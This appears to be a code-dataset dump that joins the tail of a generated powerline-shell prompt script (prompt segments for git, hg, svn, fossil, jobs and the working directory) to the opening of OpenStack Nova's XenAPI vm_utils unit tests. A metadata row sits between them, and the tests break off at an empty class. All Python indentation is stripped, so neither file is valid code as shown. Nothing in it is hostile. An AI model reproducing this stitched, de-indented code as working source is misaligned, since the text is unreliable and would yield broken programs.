REPO_DIRTY_FG = 15 # white
JOBS_FG = 39
JOBS_BG = 238
CMD_PASSED_BG = 236
CMD_PASSED_FG = 15
CMD_FAILED_BG = 161
CMD_FAILED_FG = 15
SVN_CHANGES_BG = 148
SVN_CHANGES_FG = 22 # dark green
VIRTUAL_ENV_BG = 35 # a mid-tone green
VIRTUAL_ENV_FG = 00
class Color(DefaultColor):
"""
This subclass is required when the user chooses to use 'default' theme.
Because the segments require a 'Color' class for every theme.
"""
pass
import os
def add_virtual_env_segment():
env = os.getenv('VIRTUAL_ENV')
if env is None:
return
env_name = os.path.basename(env)
bg = Color.VIRTUAL_ENV_BG
fg = Color.VIRTUAL_ENV_FG
powerline.append(' %s ' % env_name, fg, bg)
add_virtual_env_segment()
def add_username_segment():
import os
if powerline.args.shell == 'bash':
user_prompt = ' \\u '
elif powerline.args.shell == 'zsh':
user_prompt = ' %n '
else:
user_prompt = ' %s ' % os.getenv('USER')
if os.getenv('USER') == 'root':
bgcolor = Color.USERNAME_ROOT_BG
else:
bgcolor = Color.USERNAME_BG
powerline.append(user_prompt, Color.USERNAME_FG, bgcolor)
add_username_segment()
def add_hostname_segment():
if powerline.args.colorize_hostname:
from lib.color_compliment import stringToHashToColorAndOpposite
from lib.colortrans import rgb2short
from socket import gethostname
hostname = gethostname()
FG, BG = stringToHashToColorAndOpposite(hostname)
FG, BG = (rgb2short(*color) for color in [FG, BG])
host_prompt = ' %s' % hostname.split('.')[0]
powerline.append(host_prompt, FG, BG)
else:
if powerline.args.shell == 'bash':
host_prompt = ' \\h '
elif powerline.args.shell == 'zsh':
host_prompt = ' %m '
else:
import socket
host_prompt = ' %s ' % socket.gethostname().split('.')[0]
powerline.append(host_prompt, Color.HOSTNAME_FG, Color.HOSTNAME_BG)
add_hostname_segment()
import os
def add_ssh_segment():
if os.getenv('SSH_CLIENT'):
powerline.append(' %s ' % powerline.network, Color.SSH_FG, Color.SSH_BG)
add_ssh_segment()
import os
def get_short_path(cwd):
home = os.getenv('HOME')
names = cwd.split(os.sep)
if names[0] == '': names = names[1:]
path = ''
for i in range(len(names)):
path += os.sep + names[i]
if os.path.samefile(path, home):
return ['~'] + names[i+1:]
if not names[0]:
return ['/']
return names
def add_cwd_segment():
cwd = powerline.cwd or os.getenv('PWD')
names = get_short_path(cwd.decode('utf-8'))
max_depth = powerline.args.cwd_max_depth
if len(names) > max_depth:
names = names[:2] + [u'\u2026'] + names[2 - max_depth:]
if not powerline.args.cwd_only:
for n in names[:-1]:
if n == '~' and Color.HOME_SPECIAL_DISPLAY:
powerline.append(' %s ' % n, Color.HOME_FG, Color.HOME_BG)
else:
powerline.append(' %s ' % n, Color.PATH_FG, Color.PATH_BG,
powerline.separator_thin, Color.SEPARATOR_FG)
if names[-1] == '~' and Color.HOME_SPECIAL_DISPLAY:
powerline.append(' %s ' % names[-1], Color.HOME_FG, Color.HOME_BG)
else:
powerline.append(' %s ' % names[-1], Color.CWD_FG, Color.PATH_BG)
add_cwd_segment()
import os
def add_read_only_segment():
cwd = powerline.cwd or os.getenv('PWD')
if not os.access(cwd, os.W_OK):
powerline.append(' %s ' % powerline.lock, Color.READONLY_FG, Color.READONLY_BG)
add_read_only_segment()
import re
import subprocess
def get_git_status():
has_pending_commits = True
has_untracked_files = False
origin_position = ""
output = subprocess.Popen(['git', 'status', '--ignore-submodules'],
env={"LANG": "C", "HOME": os.getenv("HOME")}, stdout=subprocess.PIPE).communicate()[0]
for line in output.split('\n'):
origin_status = re.findall(
r"Your branch is (ahead|behind).*?(\d+) comm", line)
if origin_status:
origin_position = " %d" % int(origin_status[0][1])
if origin_status[0][0] == 'behind':
origin_position += u'\u21E3'
if origin_status[0][0] == 'ahead':
origin_position += u'\u21E1'
if line.find('nothing to commit') >= 0:
has_pending_commits = False
if line.find('Untracked files') >= 0:
has_untracked_files = True
return has_pending_commits, has_untracked_files, origin_position
def add_git_segment():
# See http://git-blame.blogspot.com/2013/06/checking-current-branch-programatically.html
p = subprocess.Popen(['git', 'symbolic-ref', '-q', 'HEAD'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if 'Not a git repo' in err:
return
if out:
branch = out[len('refs/heads/'):].rstrip()
else:
branch = '(Detached)'
has_pending_commits, has_untracked_files, origin_position = get_git_status()
branch += origin_position
if has_untracked_files:
branch += ' +'
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
if has_pending_commits:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
powerline.append(' %s ' % branch, fg, bg)
try:
add_git_segment()
except OSError:
pass
except subprocess.CalledProcessError:
pass
import os
import subprocess
def get_hg_status():
has_modified_files = False
has_untracked_files = False
has_missing_files = False
output = subprocess.Popen(['hg', 'status'],
stdout=subprocess.PIPE).communicate()[0]
for line in output.split('\n'):
if line == '':
continue
elif line[0] == '?':
has_untracked_files = True
elif line[0] == '!':
has_missing_files = True
else:
has_modified_files = True
return has_modified_files, has_untracked_files, has_missing_files
def add_hg_segment():
branch = os.popen('hg branch 2> /dev/null').read().rstrip()
if len(branch) == 0:
return False
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
has_modified_files, has_untracked_files, has_missing_files = get_hg_status()
if has_modified_files or has_untracked_files or has_missing_files:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
extra = ''
if has_untracked_files:
extra += '+'
if has_missing_files:
extra += '!'
branch += (' ' + extra if extra != '' else '')
return powerline.append(' %s ' % branch, fg, bg)
add_hg_segment()
import subprocess
def add_svn_segment():
is_svn = subprocess.Popen(['svn', 'status'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
is_svn_output = is_svn.communicate()[1].strip()
if len(is_svn_output) != 0:
return
#"svn status | grep -c "^[ACDIMRX\\!\\~]"
p1 = subprocess.Popen(['svn', 'status'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
p2 = subprocess.Popen(['grep', '-c', '^[ACDIMR\\!\\~]'],
stdin=p1.stdout, stdout=subprocess.PIPE)
output = p2.communicate()[0].strip()
if len(output) > 0 and int(output) > 0:
changes = output.strip()
powerline.append(' %s ' % changes, Color.SVN_CHANGES_FG, Color.SVN_CHANGES_BG)
try:
add_svn_segment()
except OSError:
pass
except subprocess.CalledProcessError:
pass
import os
import subprocess
def get_fossil_status():
has_modified_files = False
has_untracked_files = False
has_missing_files = False
output = os.popen('fossil changes 2>/dev/null').read().strip()
has_untracked_files = True if os.popen("fossil extras 2>/dev/null").read().strip() else False
has_missing_files = 'MISSING' in output
has_modified_files = 'EDITED' in output
return has_modified_files, has_untracked_files, has_missing_files
def add_fossil_segment():
subprocess.Popen(['fossil'], stdout=subprocess.PIPE).communicate()[0]
branch = ''.join([i.replace('*','').strip() for i in os.popen("fossil branch 2> /dev/null").read().strip().split("\n") if i.startswith('*')])
if len(branch) == 0:
return
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
has_modified_files, has_untracked_files, has_missing_files = get_fossil_status()
if has_modified_files or has_untracked_files or has_missing_files:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
extra = ''
if has_untracked_files:
extra += '+'
if has_missing_files:
extra += '!'
branch += (' ' + extra if extra != '' else '')
powerline.append(' %s ' % branch, fg, bg)
try:
add_fossil_segment()
except OSError:
pass
except subprocess.CalledProcessError:
pass
import os
import re
import subprocess
def add_jobs_segment():
pppid = subprocess.Popen(['ps', '-p', str(os.getppid()), '-oppid='], stdout=subprocess.PIPE).communicate()[0].strip()
output = subprocess.Popen(['ps', '-a', '-o', 'ppid'], stdout=subprocess.PIPE).communicate()[0]
num_jobs = len(re.findall(str(pppid), output)) - 1
if num_jobs > 0:
powerline.append(' %d ' % num_jobs, Color.JOBS_FG, Color.JOBS_BG)
add_jobs_segment()
def add_root_indicator_segment():
root_indicators = {
'bash': ' \\$ ',
'zsh': ' \\$ ',
'bare': ' $ ',
}
bg = Color.CMD_PASSED_BG
fg = Color.CMD_PASSED_FG
if powerline.args.prev_error != 0:
fg = Color.CMD_FAILED_FG
bg = Color.CMD_FAILED_BG
powerline.append(root_indicators[powerline.args.shell], fg, bg)
add_root_indicator_segment()
sys.stdout.write(powerline.draw())
| mit | 5,095,947,534,413,453,000 | 27.876812 | 145 | 0.589649 | false |
sacharya/nova | nova/tests/virt/xenapi/test_vm_utils.py | 1 | 79589 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import uuid
from eventlet import greenthread
import fixtures
import mock
import mox
from oslo.config import cfg
from nova.compute import flavors
from nova.compute import vm_mode
from nova import context
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import processutils
from nova.openstack.common import timeutils
from nova import test
from nova.tests.virt.xenapi import stubs
from nova.tests.virt.xenapi import test_xenapi
from nova import unit
from nova import utils
from nova.virt.xenapi import driver as xenapi_conn
from nova.virt.xenapi import fake
from nova.virt.xenapi import vm_utils
from nova.virt.xenapi import volume_utils
CONF = cfg.CONF
XENSM_TYPE = 'xensm'
ISCSI_TYPE = 'iscsi'
def get_fake_connection_data(sr_type):
fakes = {XENSM_TYPE: {'sr_uuid': 'falseSR',
'name_label': 'fake_storage',
'name_description': 'test purposes',
'server': 'myserver',
'serverpath': '/local/scratch/myname',
'sr_type': 'nfs',
'introduce_sr_keys': ['server',
'serverpath',
'sr_type'],
'vdi_uuid': 'falseVDI'},
ISCSI_TYPE: {'volume_id': 'fake_volume_id',
'target_lun': 1,
'target_iqn': 'fake_iqn:volume-fake_volume_id',
'target_portal': u'localhost:3260',
'target_discovered': False}, }
return fakes[sr_type]
def _get_fake_session_and_exception(error):
session = mock.Mock()
class FakeException(Exception):
details = [error, "a", "b", "c"]
session.XenAPI.Failure = FakeException
session.call_xenapi.side_effect = FakeException
return session
@contextlib.contextmanager
def contextified(result):
yield result
def _fake_noop(*args, **kwargs):
return
class VMUtilsTestBase(stubs.XenAPITestBaseNoDB):
pass
class LookupTestCase(VMUtilsTestBase):
def setUp(self):
super(LookupTestCase, self).setUp()
self.session = self.mox.CreateMockAnything('Fake Session')
self.name_label = 'my_vm'
def _do_mock(self, result):
self.session.call_xenapi(
"VM.get_by_name_label", self.name_label).AndReturn(result)
self.mox.ReplayAll()
def test_normal(self):
self._do_mock(['x'])
result = vm_utils.lookup(self.session, self.name_label)
self.assertEqual('x', result)
def test_no_result(self):
self._do_mock([])
result = vm_utils.lookup(self.session, self.name_label)
self.assertIsNone(result)
def test_too_many(self):
self._do_mock(['a', 'b'])
self.assertRaises(exception.InstanceExists,
vm_utils.lookup,
self.session, self.name_label)
def test_rescue_none(self):
self.session.call_xenapi(
"VM.get_by_name_label", self.name_label + '-rescue').AndReturn([])
self._do_mock(['x'])
result = vm_utils.lookup(self.session, self.name_label,
check_rescue=True)
self.assertEqual('x', result)
def test_rescue_found(self):
self.session.call_xenapi(
"VM.get_by_name_label",
self.name_label + '-rescue').AndReturn(['y'])
self.mox.ReplayAll()
result = vm_utils.lookup(self.session, self.name_label,
check_rescue=True)
self.assertEqual('y', result)
def test_rescue_too_many(self):
self.session.call_xenapi(
"VM.get_by_name_label",
self.name_label + '-rescue').AndReturn(['a', 'b', 'c'])
self.mox.ReplayAll()
self.assertRaises(exception.InstanceExists,
vm_utils.lookup,
self.session, self.name_label,
check_rescue=True)
class GenerateConfigDriveTestCase(VMUtilsTestBase):
def test_no_admin_pass(self):
# This is here to avoid masking errors, it shouldn't be used normally
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.xenapi.vm_utils.destroy_vdi', _fake_noop))
# Mocks
instance = {}
self.mox.StubOutWithMock(vm_utils, 'safe_find_sr')
vm_utils.safe_find_sr('session').AndReturn('sr_ref')
self.mox.StubOutWithMock(vm_utils, 'create_vdi')
vm_utils.create_vdi('session', 'sr_ref', instance, 'config-2',
'configdrive',
64 * unit.Mi).AndReturn('vdi_ref')
self.mox.StubOutWithMock(vm_utils, 'vdi_attached_here')
vm_utils.vdi_attached_here(
'session', 'vdi_ref', read_only=False).AndReturn(
contextified('mounted_dev'))
class FakeInstanceMetadata(object):
def __init__(_self, instance, content=None, extra_md=None,
network_info=None):
self.assertEqual(network_info, "nw_info")
def metadata_for_config_drive(_self):
return []
self.useFixture(fixtures.MonkeyPatch(
'nova.api.metadata.base.InstanceMetadata',
FakeInstanceMetadata))
self.mox.StubOutWithMock(utils, 'execute')
utils.execute('genisoimage', '-o', mox.IgnoreArg(), '-ldots',
'-allow-lowercase', '-allow-multidot', '-l',
'-publisher', mox.IgnoreArg(), '-quiet',
'-J', '-r', '-V', 'config-2', mox.IgnoreArg(),
attempts=1, run_as_root=False).AndReturn(None)
utils.execute('dd', mox.IgnoreArg(), mox.IgnoreArg(),
run_as_root=True).AndReturn(None)
self.mox.StubOutWithMock(vm_utils, 'create_vbd')
vm_utils.create_vbd('session', 'vm_ref', 'vdi_ref', mox.IgnoreArg(),
bootable=False, read_only=True).AndReturn(None)
self.mox.ReplayAll()
# And the actual call we're testing
vm_utils.generate_configdrive('session', instance, 'vm_ref',
'userdevice', "nw_info")
class XenAPIGetUUID(VMUtilsTestBase):
def test_get_this_vm_uuid_new_kernel(self):
self.mox.StubOutWithMock(vm_utils, '_get_sys_hypervisor_uuid')
vm_utils._get_sys_hypervisor_uuid().AndReturn(
'2f46f0f5-f14c-ef1b-1fac-9eeca0888a3f')
self.mox.ReplayAll()
self.assertEqual('2f46f0f5-f14c-ef1b-1fac-9eeca0888a3f',
vm_utils.get_this_vm_uuid(None))
self.mox.VerifyAll()
def test_get_this_vm_uuid_old_kernel_reboot(self):
self.mox.StubOutWithMock(vm_utils, '_get_sys_hypervisor_uuid')
self.mox.StubOutWithMock(utils, 'execute')
vm_utils._get_sys_hypervisor_uuid().AndRaise(
IOError(13, 'Permission denied'))
utils.execute('xenstore-read', 'domid', run_as_root=True).AndReturn(
('27', ''))
utils.execute('xenstore-read', '/local/domain/27/vm',
run_as_root=True).AndReturn(
('/vm/2f46f0f5-f14c-ef1b-1fac-9eeca0888a3f', ''))
self.mox.ReplayAll()
self.assertEqual('2f46f0f5-f14c-ef1b-1fac-9eeca0888a3f',
vm_utils.get_this_vm_uuid(None))
self.mox.VerifyAll()
class FakeSession(object):
def call_xenapi(self, *args):
pass
def call_plugin(self, *args):
pass
def call_plugin_serialized(self, plugin, fn, *args, **kwargs):
pass
def call_plugin_serialized_with_retry(self, plugin, fn, num_retries,
callback, *args, **kwargs):
pass
class FetchVhdImageTestCase(VMUtilsTestBase):
def setUp(self):
super(FetchVhdImageTestCase, self).setUp()
self.context = context.get_admin_context()
self.context.auth_token = 'auth_token'
self.session = FakeSession()
self.instance = {"uuid": "uuid"}
self.mox.StubOutWithMock(vm_utils, '_make_uuid_stack')
vm_utils._make_uuid_stack().AndReturn(["uuid_stack"])
self.mox.StubOutWithMock(vm_utils, 'get_sr_path')
vm_utils.get_sr_path(self.session).AndReturn('sr_path')
def _stub_glance_download_vhd(self, raise_exc=None):
self.mox.StubOutWithMock(
self.session, 'call_plugin_serialized_with_retry')
func = self.session.call_plugin_serialized_with_retry(
'glance', 'download_vhd', 0, mox.IgnoreArg(),
extra_headers={'X-Service-Catalog': '[]',
'X-Auth-Token': 'auth_token',
'X-Roles': '',
'X-Tenant-Id': None,
'X-User-Id': None,
'X-Identity-Status': 'Confirmed'},
image_id='image_id',
uuid_stack=["uuid_stack"],
sr_path='sr_path')
if raise_exc:
func.AndRaise(raise_exc)
else:
func.AndReturn({'root': {'uuid': 'vdi'}})
def _stub_bittorrent_download_vhd(self, raise_exc=None):
self.mox.StubOutWithMock(
self.session, 'call_plugin_serialized')
func = self.session.call_plugin_serialized(
'bittorrent', 'download_vhd',
image_id='image_id',
uuid_stack=["uuid_stack"],
sr_path='sr_path',
torrent_download_stall_cutoff=600,
torrent_listen_port_start=6881,
torrent_listen_port_end=6891,
torrent_max_last_accessed=86400,
torrent_max_seeder_processes_per_host=1,
torrent_seed_chance=1.0,
torrent_seed_duration=3600,
torrent_url='http://foo/image_id.torrent'
)
if raise_exc:
func.AndRaise(raise_exc)
else:
func.AndReturn({'root': {'uuid': 'vdi'}})
def test_fetch_vhd_image_works_with_glance(self):
self.mox.StubOutWithMock(vm_utils, '_image_uses_bittorrent')
vm_utils._image_uses_bittorrent(
self.context, self.instance).AndReturn(False)
self._stub_glance_download_vhd()
self.mox.StubOutWithMock(vm_utils, 'safe_find_sr')
vm_utils.safe_find_sr(self.session).AndReturn("sr")
self.mox.StubOutWithMock(vm_utils, '_scan_sr')
vm_utils._scan_sr(self.session, "sr")
self.mox.StubOutWithMock(vm_utils, '_check_vdi_size')
vm_utils._check_vdi_size(
self.context, self.session, self.instance, "vdi")
self.mox.ReplayAll()
self.assertEqual("vdi", vm_utils._fetch_vhd_image(self.context,
self.session, self.instance, 'image_id')['root']['uuid'])
self.mox.VerifyAll()
def test_fetch_vhd_image_works_with_bittorrent(self):
cfg.CONF.import_opt('torrent_base_url',
'nova.virt.xenapi.image.bittorrent',
group='xenserver')
self.flags(torrent_base_url='http://foo', group='xenserver')
self.mox.StubOutWithMock(vm_utils, '_image_uses_bittorrent')
vm_utils._image_uses_bittorrent(
self.context, self.instance).AndReturn(True)
self._stub_bittorrent_download_vhd()
self.mox.StubOutWithMock(vm_utils, 'safe_find_sr')
vm_utils.safe_find_sr(self.session).AndReturn("sr")
self.mox.StubOutWithMock(vm_utils, '_scan_sr')
vm_utils._scan_sr(self.session, "sr")
self.mox.StubOutWithMock(vm_utils, '_check_vdi_size')
vm_utils._check_vdi_size(self.context, self.session, self.instance,
"vdi")
self.mox.ReplayAll()
self.assertEqual("vdi", vm_utils._fetch_vhd_image(self.context,
self.session, self.instance, 'image_id')['root']['uuid'])
self.mox.VerifyAll()
def test_fetch_vhd_image_cleans_up_vdi_on_fail(self):
self.mox.StubOutWithMock(vm_utils, '_image_uses_bittorrent')
vm_utils._image_uses_bittorrent(
self.context, self.instance).AndReturn(False)
self._stub_glance_download_vhd()
self.mox.StubOutWithMock(vm_utils, 'safe_find_sr')
vm_utils.safe_find_sr(self.session).AndReturn("sr")
self.mox.StubOutWithMock(vm_utils, '_scan_sr')
vm_utils._scan_sr(self.session, "sr")
self.mox.StubOutWithMock(vm_utils, '_check_vdi_size')
vm_utils._check_vdi_size(self.context, self.session, self.instance,
"vdi").AndRaise(exception.FlavorDiskTooSmall)
self.mox.StubOutWithMock(self.session, 'call_xenapi')
self.session.call_xenapi("VDI.get_by_uuid", "vdi").AndReturn("ref")
self.mox.StubOutWithMock(vm_utils, 'destroy_vdi')
vm_utils.destroy_vdi(self.session, "ref")
self.mox.ReplayAll()
self.assertRaises(exception.FlavorDiskTooSmall,
vm_utils._fetch_vhd_image, self.context, self.session,
self.instance, 'image_id')
self.mox.VerifyAll()
def test_fallback_to_default_handler(self):
cfg.CONF.import_opt('torrent_base_url',
'nova.virt.xenapi.image.bittorrent',
group='xenserver')
self.flags(torrent_base_url='http://foo', group='xenserver')
self.mox.StubOutWithMock(vm_utils, '_image_uses_bittorrent')
vm_utils._image_uses_bittorrent(
self.context, self.instance).AndReturn(True)
self._stub_bittorrent_download_vhd(raise_exc=RuntimeError)
vm_utils._make_uuid_stack().AndReturn(["uuid_stack"])
vm_utils.get_sr_path(self.session).AndReturn('sr_path')
self._stub_glance_download_vhd()
self.mox.StubOutWithMock(vm_utils, 'safe_find_sr')
vm_utils.safe_find_sr(self.session).AndReturn("sr")
self.mox.StubOutWithMock(vm_utils, '_scan_sr')
vm_utils._scan_sr(self.session, "sr")
self.mox.StubOutWithMock(vm_utils, '_check_vdi_size')
vm_utils._check_vdi_size(self.context, self.session, self.instance,
"vdi")
self.mox.ReplayAll()
self.assertEqual("vdi", vm_utils._fetch_vhd_image(self.context,
self.session, self.instance, 'image_id')['root']['uuid'])
self.mox.VerifyAll()
def test_default_handler_doesnt_fallback_to_itself(self):
cfg.CONF.import_opt('torrent_base_url',
'nova.virt.xenapi.image.bittorrent',
group='xenserver')
self.flags(torrent_base_url='http://foo', group='xenserver')
self.mox.StubOutWithMock(vm_utils, '_image_uses_bittorrent')
vm_utils._image_uses_bittorrent(
self.context, self.instance).AndReturn(False)
self._stub_glance_download_vhd(raise_exc=RuntimeError)
self.mox.ReplayAll()
self.assertRaises(RuntimeError, vm_utils._fetch_vhd_image,
self.context, self.session, self.instance, 'image_id')
self.mox.VerifyAll()
class TestImageCompression(VMUtilsTestBase):
def test_image_compression(self):
# Testing for nova.conf, too low, negative, and a correct value.
self.assertIsNone(vm_utils.get_compression_level())
self.flags(image_compression_level=0, group='xenserver')
self.assertIsNone(vm_utils.get_compression_level())
self.flags(image_compression_level=-6, group='xenserver')
self.assertIsNone(vm_utils.get_compression_level())
self.flags(image_compression_level=6, group='xenserver')
self.assertEqual(vm_utils.get_compression_level(), 6)
class ResizeHelpersTestCase(VMUtilsTestBase):
def test_repair_filesystem(self):
self.mox.StubOutWithMock(utils, 'execute')
utils.execute('e2fsck', '-f', "-y", "fakepath",
run_as_root=True, check_exit_code=[0, 1, 2]).AndReturn(
("size is: 42", ""))
self.mox.ReplayAll()
vm_utils._repair_filesystem("fakepath")
def _call_tune2fs_remove_journal(self, path):
utils.execute("tune2fs", "-O ^has_journal", path, run_as_root=True)
def _call_tune2fs_add_journal(self, path):
utils.execute("tune2fs", "-j", path, run_as_root=True)
def _call_parted(self, path, start, end):
utils.execute('parted', '--script', path, 'rm', '1',
run_as_root=True)
utils.execute('parted', '--script', path, 'mkpart',
'primary', '%ds' % start, '%ds' % end, run_as_root=True)
def test_resize_part_and_fs_down_succeeds(self):
self.mox.StubOutWithMock(vm_utils, "_repair_filesystem")
self.mox.StubOutWithMock(utils, 'execute')
dev_path = "/dev/fake"
partition_path = "%s1" % dev_path
vm_utils._repair_filesystem(partition_path)
self._call_tune2fs_remove_journal(partition_path)
utils.execute("resize2fs", partition_path, "10s", run_as_root=True)
self._call_parted(dev_path, 0, 9)
self._call_tune2fs_add_journal(partition_path)
self.mox.ReplayAll()
vm_utils._resize_part_and_fs("fake", 0, 20, 10)
def test_log_progress_if_required(self):
self.mox.StubOutWithMock(vm_utils.LOG, "debug")
vm_utils.LOG.debug(_("Sparse copy in progress, "
"%(complete_pct).2f%% complete. "
"%(left)s bytes left to copy"),
{"complete_pct": 50.0, "left": 1})
current = timeutils.utcnow()
timeutils.set_time_override(current)
timeutils.advance_time_seconds(vm_utils.PROGRESS_INTERVAL_SECONDS + 1)
self.mox.ReplayAll()
vm_utils._log_progress_if_required(1, current, 2)
def test_log_progress_if_not_required(self):
self.mox.StubOutWithMock(vm_utils.LOG, "debug")
current = timeutils.utcnow()
timeutils.set_time_override(current)
timeutils.advance_time_seconds(vm_utils.PROGRESS_INTERVAL_SECONDS - 1)
self.mox.ReplayAll()
vm_utils._log_progress_if_required(1, current, 2)
def test_resize_part_and_fs_down_fails_disk_too_big(self):
self.mox.StubOutWithMock(vm_utils, "_repair_filesystem")
self.mox.StubOutWithMock(utils, 'execute')
dev_path = "/dev/fake"
partition_path = "%s1" % dev_path
new_sectors = 10
vm_utils._repair_filesystem(partition_path)
self._call_tune2fs_remove_journal(partition_path)
mobj = utils.execute("resize2fs",
partition_path,
"%ss" % new_sectors,
run_as_root=True)
mobj.AndRaise(processutils.ProcessExecutionError)
self.mox.ReplayAll()
self.assertRaises(exception.ResizeError,
vm_utils._resize_part_and_fs, "fake", 0, 20, 10)
def test_resize_part_and_fs_up_succeeds(self):
self.mox.StubOutWithMock(vm_utils, "_repair_filesystem")
self.mox.StubOutWithMock(utils, 'execute')
dev_path = "/dev/fake"
partition_path = "%s1" % dev_path
vm_utils._repair_filesystem(partition_path)
self._call_tune2fs_remove_journal(partition_path)
self._call_parted(dev_path, 0, 29)
utils.execute("resize2fs", partition_path, run_as_root=True)
self._call_tune2fs_add_journal(partition_path)
self.mox.ReplayAll()
vm_utils._resize_part_and_fs("fake", 0, 20, 30)
def test_resize_disk_throws_on_zero_size(self):
self.assertRaises(exception.ResizeError,
vm_utils.resize_disk, "session", "instance", "vdi_ref",
{"root_gb": 0})
def test_auto_config_disk_returns_early_on_zero_size(self):
vm_utils.try_auto_configure_disk("bad_session", "bad_vdi_ref", 0)
class CheckVDISizeTestCase(VMUtilsTestBase):
def setUp(self):
super(CheckVDISizeTestCase, self).setUp()
self.context = 'fakecontext'
self.session = 'fakesession'
self.instance = dict(uuid='fakeinstance')
self.vdi_uuid = 'fakeuuid'
def test_not_too_large(self):
self.mox.StubOutWithMock(flavors, 'extract_flavor')
flavors.extract_flavor(self.instance).AndReturn(
dict(root_gb=1))
self.mox.StubOutWithMock(vm_utils, '_get_vdi_chain_size')
vm_utils._get_vdi_chain_size(self.session,
self.vdi_uuid).AndReturn(1073741824)
self.mox.ReplayAll()
vm_utils._check_vdi_size(self.context, self.session, self.instance,
self.vdi_uuid)
def test_too_large(self):
self.mox.StubOutWithMock(flavors, 'extract_flavor')
flavors.extract_flavor(self.instance).AndReturn(
dict(root_gb=1))
self.mox.StubOutWithMock(vm_utils, '_get_vdi_chain_size')
vm_utils._get_vdi_chain_size(self.session,
self.vdi_uuid).AndReturn(11811160065) # 10GB overhead allowed
self.mox.ReplayAll()
self.assertRaises(exception.FlavorDiskTooSmall,
vm_utils._check_vdi_size, self.context, self.session,
self.instance, self.vdi_uuid)
def test_zero_root_gb_disables_check(self):
self.mox.StubOutWithMock(flavors, 'extract_flavor')
flavors.extract_flavor(self.instance).AndReturn(
dict(root_gb=0))
self.mox.ReplayAll()
vm_utils._check_vdi_size(self.context, self.session, self.instance,
self.vdi_uuid)
class GetInstanceForVdisForSrTestCase(VMUtilsTestBase):
def setUp(self):
super(GetInstanceForVdisForSrTestCase, self).setUp()
self.flags(disable_process_locking=True,
instance_name_template='%d',
firewall_driver='nova.virt.xenapi.firewall.'
'Dom0IptablesFirewallDriver')
self.flags(connection_url='test_url',
connection_password='test_pass',
group='xenserver')
def test_get_instance_vdis_for_sr(self):
vm_ref = fake.create_vm("foo", "Running")
sr_ref = fake.create_sr()
vdi_1 = fake.create_vdi('vdiname1', sr_ref)
vdi_2 = fake.create_vdi('vdiname2', sr_ref)
for vdi_ref in [vdi_1, vdi_2]:
fake.create_vbd(vm_ref, vdi_ref)
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
result = list(vm_utils.get_instance_vdis_for_sr(
driver._session, vm_ref, sr_ref))
self.assertEqual([vdi_1, vdi_2], result)
def test_get_instance_vdis_for_sr_no_vbd(self):
vm_ref = fake.create_vm("foo", "Running")
sr_ref = fake.create_sr()
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
result = list(vm_utils.get_instance_vdis_for_sr(
driver._session, vm_ref, sr_ref))
self.assertEqual([], result)
def test_get_vdi_uuid_for_volume_with_sr_uuid(self):
connection_data = get_fake_connection_data(XENSM_TYPE)
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
vdi_uuid = vm_utils.get_vdi_uuid_for_volume(
driver._session, connection_data)
self.assertEqual(vdi_uuid, 'falseVDI')
def test_get_vdi_uuid_for_volume_failure(self):
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
def bad_introduce_sr(session, sr_uuid, label, sr_params):
return None
self.stubs.Set(volume_utils, 'introduce_sr', bad_introduce_sr)
connection_data = get_fake_connection_data(XENSM_TYPE)
self.assertRaises(exception.NovaException,
vm_utils.get_vdi_uuid_for_volume,
driver._session, connection_data)
def test_get_vdi_uuid_for_volume_from_iscsi_vol_missing_sr_uuid(self):
connection_data = get_fake_connection_data(ISCSI_TYPE)
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
vdi_uuid = vm_utils.get_vdi_uuid_for_volume(
driver._session, connection_data)
self.assertIsNotNone(vdi_uuid)
class VMRefOrRaiseVMFoundTestCase(VMUtilsTestBase):
def test_lookup_call(self):
mock = mox.Mox()
mock.StubOutWithMock(vm_utils, 'lookup')
vm_utils.lookup('session', 'somename').AndReturn('ignored')
mock.ReplayAll()
vm_utils.vm_ref_or_raise('session', 'somename')
mock.VerifyAll()
def test_return_value(self):
mock = mox.Mox()
mock.StubOutWithMock(vm_utils, 'lookup')
vm_utils.lookup(mox.IgnoreArg(), mox.IgnoreArg()).AndReturn('vmref')
mock.ReplayAll()
self.assertEqual(
'vmref', vm_utils.vm_ref_or_raise('session', 'somename'))
mock.VerifyAll()
class VMRefOrRaiseVMNotFoundTestCase(VMUtilsTestBase):
def test_exception_raised(self):
mock = mox.Mox()
mock.StubOutWithMock(vm_utils, 'lookup')
vm_utils.lookup('session', 'somename').AndReturn(None)
mock.ReplayAll()
self.assertRaises(
exception.InstanceNotFound,
lambda: vm_utils.vm_ref_or_raise('session', 'somename')
)
mock.VerifyAll()
def test_exception_msg_contains_vm_name(self):
mock = mox.Mox()
mock.StubOutWithMock(vm_utils, 'lookup')
vm_utils.lookup('session', 'somename').AndReturn(None)
mock.ReplayAll()
try:
vm_utils.vm_ref_or_raise('session', 'somename')
except exception.InstanceNotFound as e:
self.assertTrue(
'somename' in str(e))
mock.VerifyAll()
class BittorrentTestCase(VMUtilsTestBase):
